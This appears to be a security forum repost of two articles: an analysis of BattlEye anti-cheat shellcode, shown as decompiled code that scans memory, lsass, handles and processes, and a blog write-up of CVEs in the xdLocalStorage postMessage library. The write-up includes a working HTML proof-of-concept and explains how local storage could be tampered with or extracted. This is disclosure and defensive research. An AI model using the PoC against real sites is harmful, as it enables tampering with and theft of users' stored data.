    [1] The Virtual Address Descriptor tree is used by the Windows memory manager to describe memory ranges used by a process as they are allocated. When a process allocates memory with VirutalAlloc, the memory manager creates an entry in the VAD tree. Source

    The game and lsass process are scanned for executable memory outside of known modules by checking the Type field in MEMORY_BASIC_INFORMATION. This field will be MEM_IMAGE if the memory section is mapped properly by the Windows image loader (Ldr), whereas the field would be MEM_PRIVATE or MEM_MAPPED if allocated by other means. This is actually the proper way to detect shellcode and was implemented in my project MapDetection over three years ago. Thankfully anti-cheats are now up to speed.

    After this scan is done, a game-specific check has been added which caught my attention. The shellcode will spam IsBadReadPtr on reserved and freed memory, which should always return true as there would normally not be any available memory in these sections. This aims to catch cheaters manually modifying the virtual address descriptor[3] to hide their memory from the anti-cheat. While this is actually a good idea in theory, this kind of spamming is going to hurt performance and IsBadReadPtr is very simple to hook.

    for ( search_index = 0; ; ++search_index )
    {
      search_count = lsass_handle ? 2 : 1;
      if ( search_index >= search_count )
        break;
      // SEARCH CURRENT PROCESS BEFORE LSASS
      if ( search_index )
        current_process = lsass_handle;
      else
        current_process = -1;
      
      // ITERATE ENTIRE ADDRESS SPACE OF PROCESS
      for ( current_address = 0;
            NtQueryVirtualMemory)(
              current_process,
              current_address,
              0,
              &mem_info,
              sizeof(mem_info),
              &used_length) >= 0;
            current_address = (char *)mem_info.BaseAddress + mem_info.RegionSize )
      {
        // FIND ANY EXECUTABLE MEMORY THAT DOES NOT BELONG TO A MODULE
        if ( mem_info.State == MEM_COMMIT
          && (mem_info.Protect == PAGE_EXECUTE
           || mem_info.Protect == PAGE_EXECUTE_READ
           || mem_info.Protect == PAGE_EXECUTE_READWRITE)
          && (mem_info.Type == MEM_PRIVATE || mem_info.Type == MEM_MAPPED)
          && (mem_info.BaseAddress > SHELLCODE_ADDRESS || 
              mem_info.BaseAddress + mem_info.RegionSize <= SHELLCODE_ADDRESS) )
        {
          report.pad = 0;
          report.id = 0x10;
          report.base_address = (__int64)mem_info.BaseAddress;
          report.region_size = mem_info.RegionSize;
          report.meta = mem_info.Type | mem_info.Protect | mem_info.State;
          battleye::send(&report, sizeof(report), 0);
          if ( !search_index
            && (mem_info.RegionSize != 0x12000 && mem_info.RegionSize >= 0x11000 && mem_info.RegionSize <= 0x500000
             || mem_info.RegionSize == 0x9000
             || mem_info.RegionSize == 0x7000
             || mem_info.RegionSize >= 0x2000 && mem_info.RegionSize <= 0xF000 && mem_info.Protect == PAGE_EXECUTE_READ))
          {
            // INITIATE RAW DATA PACKET
            report.pad = 0;
            report.id = 0xBE;
            battleye::send(&report, sizeof(report), false);
            // DUMP SHELLCODE IN CHUNKS OF 0x27EA (WHY?)
            for ( chunk_index = 0; ; ++chunk_index )
            {
              if ( chunk_index >= mem_info.region_size / 0x27EA + 1 )
                break;
              buffer_size = chunk_index >= mem_info.region_size / 0x27EA ? mem_info.region_size % 0x27EA : 0x27EA;
              if ( NtReadVirtualMemory(current_process, mem_info.base_address, &report.buffer, buffer_size, 0x00) < 0 )
                break;
              report.pad = 0;
              report.id = 0xBEu;
              battleye::send(&v313, buffer_size + 2, false);
            } 
          }
        }
        // TRY TO FIND DKOM'D MEMORY IN LOCAL PROCESS
        if ( !search_index
          && (mem_info.State == MEM_COMMIT && (mem_info.Protect == PAGE_NOACCESS || !mem_info.Protect)
           || mem_info.State == MEM_FREE
           || mem_info.State == MEM_RESERVE) )
        {
          toggle = 0;
          for ( scan_address = current_address;
                scan_address < (char *)mem_info.BaseAddress + mem_info.RegionSize
             && scan_address < (char *)mem_info.BaseAddress + 0x40000000;
                scan_address += 0x20000 )
          {
            if ( !IsBadReadPtr(scan_address, 1)
              && NtQueryVirtualMemory(GetCurrentProcess(), scan_address, 0, &local_mem_info, sizeof(local_mem_info), &used_length) >= 0
              && local_mem_info.State == mem_info.State
              && (local_mem_info.State != 4096 || local_mem_info.Protect == mem_info.Protect) )
            {
              if ( !toggle )
              {
                report.pad = 0;
                report.id = 0x10;
                report.base_address = mem_info.BaseAddress;
                report.region_size = mem_info.RegionSize;
                report.meta = mem_info.Type | mem_info.Protect | mem_info.State;
                battleye::send(&report, sizeof(report), 0);
                toggle = 1;
              }
              report.pad = 0;
              report.id = 0x10;
              report.base_address = local_mem_info.BaseAddress;
              report.region_size = local_mem_info.RegionSize;
              report.meta = local_mem_info.Type | local_mem_info.Protect | local_mem_info.State;
              battleye::send(&local_mem_info, sizeof(report), 0);
            }
          }
        }
      }
    }
    

    Handle enumeration

    This mechanism will enumerate all open handles on the machine and flag any game process handles. This is done to catch cheaters forcing their handles to have a certain level of access that is not normally obtainable, as the anti-cheat registers callbacks to prevent processes from gaining memory-modification rights of the game process. If a process is caught with an open handle to the game process, relevant info, such as level of access and process name, is sent to the game server:

    report_buffer = (__int8 *)malloc(0x2800);
    report_buffer[0] = 0;
    report_buffer[1] = 0x11;
    buffer_index = 2;
    handle_info = 0;
    buffer_size = 0x20;
    do
    {
      buffer_size += 0x400;
      handle_info = (SYSTEM_HANDLE_INFORMATION *)realloc(handle_info, buffer_size);
      if ( !handle_info )
        break;
      query_status = NtQuerySystemInformation(0x10, handle_info, buffer_size, &buffer_size);// SystemHandleInformation
    }
    while ( query_status == STATUS_INFO_LENGTH_MISMATCH );
    if ( handle_info && query_status >= 0 )
    {
      process_object_type_index = -1;
      for ( handle_index = 0;
            (unsigned int)handle_index < handle_info->number_of_handles && buffer_index <= 10107;
            ++handle_index )
      {
        // ONLY FILTER PROCESS HANDLES  
        if ( process_object_type_index == -1
          || (unsigned __int8)handle_info->handles[handle_index].ObjectTypeIndex == process_object_type_index )
        {
          // SEE IF OWNING PROCESS IS NOT GAME PROCESS
          if ( handle_info->handles[handle_index].UniqueProcessId != GetCurrentProcessId() )
          {
            process_handle = OpenProcess(
                               PROCESS_DUP_HANDLE,
                               0,
                               *(unsigned int *)&handle_info->handles[handle_index].UniqueProcessId);
            if ( process_handle )
            {
              // DUPLICATE THEIR HANDLE
              current_process_handle = GetCurrentProcess();
              if ( DuplicateHandle(
                     process_handle,
                     (unsigned __int16)handle_info->handles[handle_index].HandleValue,
                     current_process_handle,
                     &duplicated_handle,
                     PROCESS_QUERY_LIMITED_INFORMATION,
                     0,
                     0) )
              {
                if ( process_object_type_index == -1 )
                {
                  if ( NtQueryObject(duplicated_handle, ObjectTypeInformation, &typeinfo, 0x400, 0) >= 0
                    && !_wcsnicmp(typeinfo.Buffer, "Process", typeinfo.Length / 2) )
                  {
                    process_object_type_index = (unsigned __int8)handle_info->handles[handle_index].ObjectTypeIndex;
                  }
                }
                if ( process_object_type_index != -1 )
                {
                  // DUMP OWNING PROCESS NAME
                  target_process_id = GetProcessId(duplicated_handle);
                  if ( target_process_id == GetCurrentProcessId() )
                  {
                    if ( handle_info->handles[handle_index].GrantedAccess & PROCESS_VM_READ|PROCESS_VM_WRITE )
                    {
                      owning_process = OpenProcess(
                                         PROCESS_QUERY_LIMITED_INFORMATION,
                                         0,
                                         *(unsigned int *)&handle_info->handles[handle_index].UniqueProcessId);
                      process_name_length = 0x80;
                      if ( !owning_process
                        || !QueryFullProcessImageNameA(
                              owning_process,
                              0,
                              &report_buffer[buffer_index + 1],
                              &process_name_length) )
                      {
                        process_name_length = 0;
                      }
                      if ( owning_process )
                        CloseHandle(owning_process);
                      report_buffer[buffer_index] = process_name_length;
                      after_name_index = buffer_index + (char)process_name_length + 1;
                      *(_DWORD *)&report_buffer[after_name_index] = handle_info->handles[handle_index].GrantedAccess;
                      buffer_index = after_name_index + 4;
                    }
                  }
                }
                CloseHandle(duplicated_handle);
                CloseHandle(process_handle);
              }
              else
              {
                CloseHandle(process_handle);
              }
            }
          }
        }
      }
    }
    if ( handle_info )
      free(handle_info);
    battleye::send(report_buffer, buffer_index, false);
    free(report_buffer);
    

    Process enumeration

    The first routine the shellcode implements is a catch-all function for logging and dumping information about all running processes. This is fairly common, but is included in the article for completeness’ sake. This also uploads the file size of the primary image on disk.

    snapshot_handle = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0x00 );
    if ( snapshot_handle != INVALID_HANDLE_VALUE )
    {
      process_entry.dwSize = 0x130;
      if ( Process32First(snapshot_handle, &process_entry) )
      {
        report_buffer = (std::uint8_t*)malloc(0x5000);
        report_buffer[0] = 0;
        report_buffer[1] = 0xB;
        buffer_index = 2;
        
        // ITERATE PROCESSES
        do
        {
          target_process_handle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, false, process_entry.th32ProcessID);
          
          // QUERY PROCESS IAMGE NAME
          name_length = 0x100;
          query_result = QueryFullProcessImageNameW(target_process_handle, 0, &name_buffer, &name_length);
          name_length = WideCharToMultiByte(
              CP_UTF8, 
              0x00, 
              &name_buffer, 
              name_length,
              &report_buffer[buffer_index + 5], 
              0xFF, 
              nullptr, 
              nullptr);
          
          valid_query = target_process_handle && query_result && name_length;
          
          // Query file size
          if ( valid_query )
          {
            if ( GetFileAttributesExW(&name_buffer, GetFileExInfoStandard, &file_attributes) )
              file_size = file_attributes.nFileSizeLow;
            else
              file_size = 0;
          }
          else
          {
            // TRY QUERY AGAIN WITHOUT HANDLE
            process_id_information.process_id = (void *)process_entry.th32ProcessID;
            process_id_information.image_name.Length = '\0';
            process_id_information.image_name.MaximumLength = '\x02\0';
            process_id_information.image_name.Buffer = name_buffer;
            
            if ( NtQuerySystemInformation(SystemProcessIdInformation, 
                                            &process_id_information, 
                                            24, 
                                            1) < 0 ) 
            {
              name_length = 0;
            }
            else
            {
              name_address = &report_buffer[buffer_index + 5];
              name_length = WideCharToMultiByte(
                              CP_UTF8,
                              0,
                              (__int64 *)process_id_information.image_name.Buffer,
                              process_id_information.image_name.Length / 2,
                              name_address,
                              0xFF,
                              nullptr,
                              nullptr);
            }
            file_size = 0;
          }
    
          // IF MANUAL QUERY WORKED
          if ( name_length )
          {
            *(_DWORD *)&report_buffer[buffer_index] = process_entry.th32ProcessID;
            report_buffer[buffer_index + 4] = name_length;
            *(_DWORD *)&report_buffer[buffer_index + 5 + name_length] = file_size;
            buffer_index += name_length + 9;
          }
          if ( target_process_handle )
            CloseHandle(target_process_handle);
          
          // CACHE LSASS HANDLE FOR LATER !!
          if ( *(_DWORD *)process_entry.szExeFile == 'sasl' )
            lsass_handle = OpenProcess(0x410, 0, process_entry.th32ProcessID);
        }
        while ( Process32Next(snapshot_handle, &process_entry) && buffer_index < 0x4EFB );
    
        // CLEANUP
        CloseHandle((__int64)snapshot_handle);
        battleye::send(report_buffer, buffer_index, 0);
        free(report_buffer);
      }
    }
    

    Sursa: https://secret.club/2020/03/31/battleye-developer-tracking.html

  16. Exploiting xdLocalStorage (localStorage and postMessage)

    Published by GrimHacker on 2 April 2020

    Last updated on 7 April 2020

    Some time ago I came across a site that was using xdLocalStorage after I had been looking into the security of HTML5 postMessage. I found that the library had several common security flaws around lack of origin validation and then noticed that there was already an open issue in the project for this problem, added it to my list of things to blog about, and promptly forgot about it.

    This week I have found the time to actually write this post which I hope will prove useful not only for those using xdLocalStorage, but more generally for those attempting to find (or avoid introducing) vulnerabilities when Web Messaging is in use.

    Contents

    Background

    What is xdLocalStorage?

    “xdLocalStorage is a lightweight js library which implements LocalStorage interface and support cross domain storage by using iframe post message communication.” [sic]

    https://github.com/ofirdagan/cross-domain-local-storage/blob/master/README.md

    This library aims to solve the following problem:

    “As for now, standard HTML5 Web Storage (a.k.a Local Storage) doesn’t now allow cross domain data sharing. This may be a big problem in an organization which have a lot of sub domains and wants to share client data between them.” [sic]

    https://github.com/ofirdagan/cross-domain-local-storage/blob/master/README.md

    Origin

    “Origins are the fundamental currency of the Web’s security model. Two actors in the Web platform that share an origin are assumed to trust each other and to have the same authority. Actors with differing origins are considered potentially hostile versus each other, and are isolated from each other to varying degrees.
    For example, if Example Bank’s Web site, hosted at bank.example.com, tries to examine the DOM of Example Charity’s Web site, hosted at charity.example.org, a SecurityError DOMException will be raised.”

    https://html.spec.whatwg.org/multipage/origin.html

    Origin may be an “opaque origin” or a “tuple origin”.

    The former is serialised to “null” and can only meaningfully be tested for equality. A unique opaque origin is assigned to an img, audio, or video element when the data is fetched cross origin. An opaque origin is also used for sandboxed documents, data urls, and potentially in other circumstances.

    The latter is more commonly encountered and consists of:

    • Scheme (e.g. “http”, “https”, “ftp”, “ws”, etc)
    • Host (e.g. “www.example.com”, “203.0.113.1”, “2001:db8::1”, “localhost”)
    • Port (e.g. 80, 443, or 1234)
    • Domain (e.g. “www.example.com”) [defaults to null]

    Note “Domain” can usually be ignored to aid understanding, but is included within the specification.

    Same Origin

    Two origins, A and B, are said to be same origin if:

    1. A and B are the same opaque origin
    2. A and B are both tuple origins and their schemes, hosts, and port are identical

    The following table shows several examples of origins for A and B and indicates if they are the same origin or not:

    A B same origin
    https://example.com https://example.com YES
    http://example.com https://example.com NO
    http://example.com http://example.com:80 YES
    https://example.com https://example.com:8443 NO
    https://example.com https://www.example.com NO
    http://example.com:8080 http://example.com:8081 NO

    HTML5

    HTML5 was first released in 2008 (and has since been replaced by the “HTML Living Standard”) it introduced a range of new features including “Web Storage” and “Web Messaging”.

    Web Storage

    Web storage allows applications to store data locally within the user’s browser as strings in key/value pairs, significantly more data can be stored than in cookies.

    There are two types: local storage (localStorage) and session storage (sessionStorage). The first stores the data with no expiration whereas the second only stores it for that one session (closing the browser tab loses the data).

    There are a several security considerations when utilising web storage, as might be expected these are around access to the data. Access to web storage is restricted to the same origin.

    DNS Spoofing Attacks

    If an attacker successfully performs a DNS spoofing attack, the user’s browser will connect to the attacker’s web server and treat all responses and content as if it came from the legitimate domain (which has been spoofed). This means that the attacker will then have access to the contents of web storage and can read and manipulate it as the origin will match. In order to prevent this, it is critical that all applications are served over a secure HTTPS connection that utilise valid TLS certificates and HSTS to prevent a connection being established to a malicious server.

    Cross Directory Attacks

    Applications that are deployed to different paths within a domain usually have the same origin (i.e. same scheme, domain/host, and port) as each other. This means that JavaScript in one application can manipulate the contents of other applications within the same origin, this is a common concern for Cross Site Scripting vulnerabilities. However what may be overlooked is that sites with the same origin also share the same web storage objects, potentially exposing sensitive data set by one application to an attacker gaining access to another. It is therefore recommended applications deployed in this manner avoid utilising web storage.

    A note to testers

    Web storage is read and manipulated via JavaScript functions in the user’s browser, therefore you will not see much evidence of its use in your intercepting proxy (unless you closely review all JavaScript loaded by the application). You can utilise the developer tools in the browser to view the contents of local storage and session storage or use the developer console to execute JavaScript and access the data.

    For further information about web storage refer to the specification.
    For further information about using web storage safely refer to the OWASP HTML5 Security Cheat Sheet.

    Web Messaging (AKA cross-document messaging AKA postMessage)

    For security and privacy reasons web browsers prevent documents in different origins from affecting each other. This is a critical security feature to prevent malicious sites from reading data from other origin the user may have accessed with the same browser, or executing JavaScript within the context of the other origin.

    However sometimes an application has a legitimate need to communicate with another application within the user’s browser. For example an organisation may own several domains and need to pass information about the user between them. One technique that was used to achieve this was JSONP which I have blogged about previously.

    The HTML Standard has introduced a messaging system that allows documents to communicate with each other regardless of their source origin in order to meet this requirement without enabling Cross Site Scripting attacks.

    Document “A” can create an iframe (or open a window) that contains document “B”.
    Document “A” can then call the postMessage() method on the Window object of document “B” to trigger a message event and pass information from “A” to “B”.
    Document “B” can also use the postMessage() method on the window.parent or window.opener object to send a message to the document that opened it (in this example document “A”).

    Messages can be structured objects, e.g. nested objects and arrays, can contain JavaScript values (String, NumberDate objects, etc), and can contain certain data objects such as File BlobFileList, and ArrayBuffer objects.

    I have most commonly seen messages consisting of strings containing JSON. i.e. the sender uses JSON.stringify(data) and the receiver uses data = JSON.parse(event.data).

    Note that a HTML postMessage is completely different from a HTTP POST message!

    Note Cross-Origin Resource Sharing (CORS) can also be used to allow a web application running at one origin to access selected resources from a different origin, however that is not the focus of this post. Refer to the article from Mozilla for further information about CORS.

    Receiving a message

    In order to receive messages an event handler must be registered for incoming events. For example the addEventListener() method (often on the window) might be used to specify a function which should be called when events of type 'message' are fired.

    It is the developer’s responsibility to check the origin attribute of any messages received to ensure that they only accept messages from origins they expect.

    It is not uncommon to encounter message handling functions that are not performing any origin validation at all. However even when origin validation is attempted it is often insufficiently robust. For example (assuming the developer intended to allow messages from https://www.example.com😞

    • Regular expressions which do not escape the wildcard . character in domain names.
      e.g. https://wwwXexample.com is a valid domain name that could be registered by an attacker and would pass the following:
      var regex = /https*:\/\/www.example.com$/i; if regex.test(event.origin) {//accepted}
    • Regular expressions which do not check the string ends by using the $ character at the end of the expression.
      e.g. https://www.example.com.grimhacker.com is a valid domain that could be under the attacker’s control and pass the following:
      var regex = /https*:\/\/www\.example\.com/i; if regex.test(event.origin) {//accepted}
    • Using indexOf to verify the origin contains the expected domain name, without accounting for the entire origin (e.g. https://www.example.com.grimhacker.com would pass the following check: if (event.origin.indexOf("https://www.example.com")> -1) {//accepted}

    Even when robust origin validation is performed, the application must still perform input validation on the data received to ensure it is in the expected format before utilising it. The application must treat the message as data rather than evaluating it as code (e.g. via eval()), and avoid inserting it into the DOM (e.g. via innerHTML). This is because any vulnerability (such as Cross Site Scripting) in an allowed domain may give an attacker the opportunity to send malicious messages from the trusted origin, which may compromise the receiving application.

    The impact of an a malicious message being processed depends on the vulnerable application’s processing of the data sent, however DOM Based Cross Site Scripting is common.

    Sending a message

    When sending a message using the postMessage() method of a window the developer has the option of specifying the targetOrigin of the message either as a parameter or within the object passed in the options parameter; if the targetOrigin is not specified it defaults to / which restricts the message to same origin targets only. It is possible to use the wildcard * to allow any origin to receive the message.

    It is important to ensure that messages include a specific targetOrigin, particularly when the message contains sensitive information.

    It may be tempting for developers to use the wildcard if they have created the window object since it is easy to assume that the document within the window must be the one they intend to communicate with, however if the location of that window has changed since it was created the message will be sent to the new location, which may not be an origin which was ever intended.

    Likewise a developer may be tempted to use the wildcard when sending a message to window.parent, as they believe only legitimate domains can/will be the parent frame/window. This is often not the case and a malicious domain can open a window to the vulnerable application and wait to receive sensitive information via a message.

    A note to testers

    Web messages are entirely within the user’s browser, therefore you will not see any evidence of them within your intercepting proxy (unless you closely review all JavaScript loaded by the application).

    You can check for registered message handlers in the “Global Listeners” section of the debugger pane in the Sources tab of the Chrome developer tools:

    Click F12 to open developer tools, click the  "Sources" tab, on the debugger pane click "Global Listeners", expand the "message" section to show message handlers.

    You can use the monitorEvents() console command in the chrome developer tools to print messages to the console. e.g. to monitor message events sent from or received by the window: monitorEvents(window, "message").

    Note that you are likely to miss messages that are sent as soon as the page loads using this method as you will not have had the opportunity to start monitoring. Additionally although this will capture messages sent and received to nested iframes in the same window, it will not capture messages sent to another window.

    The most robust method I know of for capturing postMessages is the PMHook tool from AppCheck, usage of this tool is described in their Hunting HTML5 postMessage Vulnerabilities paper.

    Once you have captured the message, are able to reproduce it, and you have found the handler function you will want to use breakpoints in the handler function in order to step through the code and identify issues in the handling of messages. The following resource from Google provides an introduction to using the developer tools in Chrome: https://developers.google.com/web/tools/chrome-devtools/javascript

    For further information about web messaging refer to the specification.
    For further information about safely using web messaging refer to the OWASP HTML5 Security Cheat Sheet.
    For more in depth information regarding finding and exploiting vulnerabilities in web messages I recommend the paper Hunting HTML5 postMessage Vulnerabilities from Sec-1/AppCheck.

    The Vulnerability in xdLocalStorage

    Normal Operation Walk Through

    Normal usage of the xdLocalStorage library (according to the README) is to create a HTML document which imports xdLocalStoragePostMessageApi.min.js on the domain that will store the data – this is the “magical iframe”; and import xdLocalStorage.min.js on the “client page” which needs to manipulate the data. Note angular applications can import ng-xdLocalStorage.min.js and include xdLocalStorage and inject this module where required to use the API.

    The client

    The interface is initialised on the client page with the URL of the “magical iframe” after which the setItem(), getItem(), removeItem(), key(), and clear() API functions can be called to interact with the local storage of the domain hosting the “magical iframe”.

    When the library initialises on the client page it appends an iframe to the body of the page which loads the “magical iframe” document. It also registers an event handler using addEventListener or attachEvent (depending on browser capabilities). The init function is included below (line 56 of xdLocalStorage.js😞

      function init(customOptions) {
        options = XdUtils.extend(customOptions, options);
        var temp = document.createElement('div');
    
        if (window.addEventListener) {
          window.addEventListener('message', receiveMessage, false);
        } else {
          window.attachEvent('onmessage', receiveMessage);
        }
    
        temp.innerHTML = '<iframe id="' + options.iframeId + '" src="' + options.iframeUrl + '" style="display: none;"></iframe>';
        document.body.appendChild(temp);
        iframe = document.getElementById(options.iframeId);
      }

    When the client page calls one of the API functions it must supply any required parameters (e.g. getItem() requires the key name is specified), and a callback function. The API function calls the buildMessage() function passing an appropriate action string for itself, along with the parameters and callback function. The getItem() API function is included below as an example (line 125 of xdLocalStorage.js😞

        getItem: function (key, callback) {
          if (!isApiReady()) {
            return;
          }
          buildMessage('get', key,  null, callback);
        },

    The buildMessage() function increments a requestId and stores the callback associated to this requestId. It then creates a data object containing a namespace, the requestId, the action to be performed (e.g. getItem() causes a "get" action), key name, and value. This data is converted to a string and sent as a postMessage to the “magical iframe”. The buildMessage() function is included below (line 43 in xdLocalStorage.js😞

    function buildMessage(action, key, value, callback) {
        requestId++;
        requests[requestId] = callback;
        var data = {
          namespace: MESSAGE_NAMESPACE,
          id: requestId,
          action: action,
          key: key,
          value: value
        };
        iframe.contentWindow.postMessage(JSON.stringify(data), '*');
      }

    The “magical iframe”

    When the document is loaded a handler function is attached to the window (using either addEventListener() or attachEvent() depending on browser support) as shown below (line 90 in xdLocalStoragePostMessageApi.js😞

      if (window.addEventListener) {
        window.addEventListener('message', receiveMessage, false);
      } else {
        window.attachEvent('onmessage', receiveMessage);
      }

    It then sends a message to the parent window to indicate it is ready (line 96 in xdLocalStoragePostMessageApi.js😞

      function sendOnLoad() {
        var data = {
          namespace: MESSAGE_NAMESPACE,
          id: 'iframe-ready'
        };
        parent.postMessage(JSON.stringify(data), '*');
      }
      //on creation
      sendOnLoad();

    When a message is received, the browser will call the function that has been registered and pass it the event object. The receiveMessage() function will attempt to parse the event.data attribute as JSON and if successful check if the namespace attribute of the data object matches the configured MESSAGE_NAMESPACE. It will then call the required function based on the value of the data.action attribute, for example "get" results in a call to getData() which is passed the data.key attribute. The receiveMessage() function is included below (line 63 of xdLocalStoragePostMessageApi.js😞

      function receiveMessage(event) {
        var data;
        try {
          data = JSON.parse(event.data);
        } catch (err) {
          //not our message, can ignore
        }
    
        if (data && data.namespace === MESSAGE_NAMESPACE) {
          if (data.action === 'set') {
            setData(data.id, data.key, data.value);
          } else if (data.action === 'get') {
            getData(data.id, data.key);
          } else if (data.action === 'remove') {
            removeData(data.id, data.key);
          } else if (data.action === 'key') {
            getKey(data.id, data.key);
          } else if (data.action === 'size') {
            getSize(data.id);
          } else if (data.action === 'length') {
            getLength(data.id);
          } else if (data.action === 'clear') {
            clear(data.id);
          }
        }
      }

    The selected function will then directly interact with the localStorage object to carry out the requested action and call the postData() function to send the data back to the parent window. To illustrate this the getData() and postData() functions are shown below (respectively lines 20 and 14 in xdLocalStoragePostMessageApi.js)

      function getData(id, key) {
        var value = localStorage.getItem(key);
        var data = {
          key: key,
          value: value
        };
        postData(id, data);
      }
      function postData(id, data) {
        var mergedData = XdUtils.extend(data, defaultData);
        mergedData.id = id;
        parent.postMessage(JSON.stringify(mergedData), '*');
      }

    The client

    When a message is received, the browser will call the function that has been registered and pass it the event object. The receiveMessage() function will attempt to parse the event.data attribute as JSON and if successful check if the namespace attribute of the data object matches the configured MESSAGE_NAMESPACE. If the data.id attribute is "iframe-ready" then the initCallback() function is executed (if one has been configured), otherwise the data object is passed to the applyCallback() function. This is shown below (line 26 of xdLocalStorage.js😞

      function receiveMessage(event) {
        var data;
        try {
          data = JSON.parse(event.data);
        } catch (err) {
          //not our message, can ignore
        }
        if (data && data.namespace === MESSAGE_NAMESPACE) {
          if (data.id === 'iframe-ready') {
            iframeReady = true;
            options.initCallback();
          } else {
            applyCallback(data);
          }
        }
      }

    The applyCallback() function simply uses the data.id attribute to find the callback function that was stored for the matching requestId and executes it, passing it the data. This is shown below (line 19 of xdLocalStorage.js😞

      function applyCallback(data) {
        if (requests[data.id]) {
          requests[data.id](data);
          delete requests[data.id];
        }
      }

    Visual Example

    SiteA loads SiteB in an iframe. SiteB sends an "iframe-ready" message to SiteA. getItem is used by SiteA, which causes SiteA to send a "get" action message to SiteB and store a callback function alongside the requestId. SiteB gets the requested key value from local storage. SiteB sends the key/value to SiteA in a postMessage. SiteA executes the callback for the matching requestId and passes it the data. The sequence diagram shows (at a very high level) the interaction between the client (SiteA) and the “magical iframe” (SiteB) when the getItem function is called.
     

    The Vulnerabilities

    Missing origin validation when receiving messages

    Magic iframe – CVE-2015-9544

    The receiveMessage() function in xdLocalStoragePostMessageApi.js does not implement any validation of the origin. The only requirements for the message to be successfully processed are that the message is a string that can be parsed as JSON, the namespace attribute of the message matches the configured MESSAGE_NAMESPACE (default is "cross-domain-local-message"), and the action attribute is one of the following strings: "set", "get", "remove", "key", "size", "length", or "clear".

    Therefore a malicious domain can send a message that meets these requirements and manipulate the local storage of the domain.

    In order to exploit this issue an attacker would need to entice a user to load a malicious site, which then interacts with the legitimate site hosting the “magical iframe”.

    The following proof of concept allows the user to set a value for “pockey” in the local storage of the domain hosting the vulnerable “magic iframe”. However it would also be possible to retrieve all information from local storage and send this to the attacker, by exploiting this issue in combination with the use of a wildcard targetOrigin (discussed below).

    <html>
    	<!-- POC exploit for xdLocalStorage.js by GrimHacker https://grimhacker.com/exploiting-xdlocalstorage-(localstorage-and-postmessage) -->
    	<body>
    		<script>
    			var MESSAGE_NAMESPACE = "cross-domain-local-message";
    			var targetSite = "http://siteb.grimhacker.com:8000/cross-domain-local-storage.html" // magical iframe;
    			
    			var iframeId = "vulnerablesite";
    			var a = document.createElement("a");
    			a.href = targetSite;
    			var targetOrigin = a.origin;
    			
    			function receiveMessage(event) {
    				var data;
    				data = JSON.parse(event.data);
    				var message = document.getElementById("message");
    				message.textContent = "My Origin: " + window.origin + "\r\nevent.origin: " + event.origin + "\r\nevent.data: " + event.data;
    			}
    			
    			window.addEventListener('message', receiveMessage, false);
    
    			var temp = document.createElement('div');
    			temp.innerHTML = '<iframe id="' + iframeId + '" src="' + targetSite + '" style="display: none;"></iframe>';
    			document.body.appendChild(temp);
    			iframe = document.getElementById(iframeId);
    
    			function setValue() {
    				var valueInput = document.getElementById("valueInput");
    				var data = {
    					namespace: MESSAGE_NAMESPACE,
    					id: 1,
    					action: "set",
    					key: "pockey",
    					value: valueInput.value
    				}
    				iframe.contentWindow.postMessage(JSON.stringify(data), targetOrigin);
    			}
    		</script>
    		<div class=label>Enter a value to assign to "pockey" on the vulnerable target:</div><input id=valueInput></div>
    		<button onclick=setValue()>Set pockey</button>
    		<div><p>The latest postmessage received will be shown below:</div>
    		<div id="message" style="white-space: pre;"></div>
    		</body>
    </html>

    The screenshots below demonstrate this:

    sitea_pockey1.png?ssl=1 SiteA loads an iframe for cross-domain-local-storage.html on SiteB and receives an “iframe-ready” postMessage.
    sitea_pockey2.png?resize=525%2C242&ssl=1 SiteA sends a postMessage to the SiteB iframe to set the key “pockey” with the specified value “pocvalue” in the SiteB local storage. SiteB sends a postMessage to SiteA to indicate success.
    siteb_pockey.png?ssl=1 Checking the localstorage for SiteB shows the key and value have been set.

    Depending on how the local storage data is used by legitimate client application, altering the data as shown above may impact the security of the client application.

    Client – CVE-2015-9545

    The receiveMessage() function in xdLocalStorage.js does not implement any validation of the origin. The only requirements for the message to be successfully processed are that the message is a string that can be parsed as JSON, the data.namespace attribute of the message matches the configured MESSAGE_NAMESPACE (default is "cross-domain-local-message"), and the data.id attribute of the message matches a requestId that is currently pending.

    Therefore a malicious domain can send a message that meets these requirements and cause their malicious data to be processed by the callback configured by the vulnerable application. Note that requestId is a number that increments with each legitimate request the vulnerable application sends to the “magic iframe”, therefore exploitation would include winning a race condition.

    In order to exploit this issue an attacker would need to entice a user to load a malicious site, which then interacts with the legitimate client site. Exact exploitation of this issue would depend on how the vulnerable application uses the data they intended to retrieve from local storage, analysis of the functionality would be required in order to identify a valid attack vector.

    Wildcard targetOrigin when sending messages

    Magic iframe – CVE-2020-11610

    The postData() function in xdLocalStoragePostMessageApi.js specifies the wildcard (*) as the targetOrigin when calling the postMessage() function on the parent object. Therefore any domain can load the application hosting the “magical iframe” and receive the messages that the “magical iframe” sends.

    In order to exploit this issue an attacker would need to entice a user to load a malicious site, which then interacts with the legitimate site hosting the “magical iframe” and receives any messages it sends as a result of the interaction.

    Note that this issue can be combined with the lack of origin validation to recover all information from local storage. An attacker could first retrieve the length of local storage and then iterate through each key index and the “magical iframe” would send the key and value to the parent, which in this case would be the attacker’s domain.

    Client – CVE-2020-11611

    The buildMessage() function in xdLocalStorage.js specifies the wildcard (*) as the targetOrigin when calling the postMessage() function on the iframe object. Therefore any domain that is currently loaded within the iframe can receive the messages that the client sends.

    In order to exploit this issue an attacker would need to redirect the “magical iframe” loaded on the vulnerable application within the user’s browser to a domain they control. This is non trivial but there may be some scenarios where this can occur.

    If an attacker were able to successfully exploit this issue they would have access to any information that the client sends to the iframe, and also be able to send messages back with a valid requestId which would then be processed by the client, this may then further impact the security of the client application.

    How Wide Spread is the Issue in xdLocalStorage?

    At the time of writing all versions of xdLocalStorage (previously called cross-domain-local-storage) are vulnerable – i.e release 1.0.1 (released 2014-04-17) to 2.0.5 (released 2017-04-14).

    According to the project README the recommended method of installing is via bower or npm. npmjs.com shows that the library has around 350 weekly downloads (March 2020).

    Defence

    xdLocalStorage

    This issue has been known since at least August 2015 when Hengjie opened an Issue on the GitHub repository to notify the project owner (https://github.com/ofirdagan/cross-domain-local-storage/issues/17). However the Pull request which included functionality to whitelist origins has not been accepted or worked on since July 2016 (https://github.com/ofirdagan/cross-domain-local-storage/pull/19). The last commit on the project (at the time of writing) was in August 2018. Therefore a fix from the project maintainer may not be forthcoming.

    Consider replacing this library with a maintained alternative which includes robust origin validation, or implement validation within the existing library.

    Web Messaging

